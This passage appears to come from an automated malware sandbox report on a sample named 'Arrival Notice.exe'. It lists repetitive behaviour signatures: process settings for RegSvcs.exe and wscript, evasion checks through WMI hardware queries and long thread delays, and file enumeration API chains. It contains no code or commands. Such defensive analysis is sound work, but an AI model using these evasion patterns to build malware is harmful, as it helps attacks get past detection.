                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 15B3234
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: 2173234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2396Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7858Jump to behavior
                    Source: C:\Users\user\AppData\Local\directory\name.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                    Source: C:\Users\user\Desktop\Arrival Notice.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-100703
                    Source: C:\Users\user\Desktop\Arrival Notice.exeAPI coverage: 4.7 %
                    Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 4.9 %
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00934696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00934696
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0093C9C7
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093C93C FindFirstFileW,FindClose,0_2_0093C93C
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F200
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0093F35D
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093F65E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00933A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933A2B
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_00933D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00933D4E
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_0093BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0093BF27
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00214696 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00214696
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021C93C FindFirstFileW,FindClose,2_2_0021C93C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_0021C9C7
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0021F200
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_0021F35D
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0021F65E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00213A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00213A2B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00213D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,2_2_00213D4E
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0021BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_0021BF27
                    Source: C:\Users\user\Desktop\Arrival Notice.exeCode function: 0_2_008D4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008D4AFE
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99782Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99670Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99549Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99423Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97248Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97129Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 97013Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96782Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96657Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96122Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96012Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95891Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95766Jump to behavior
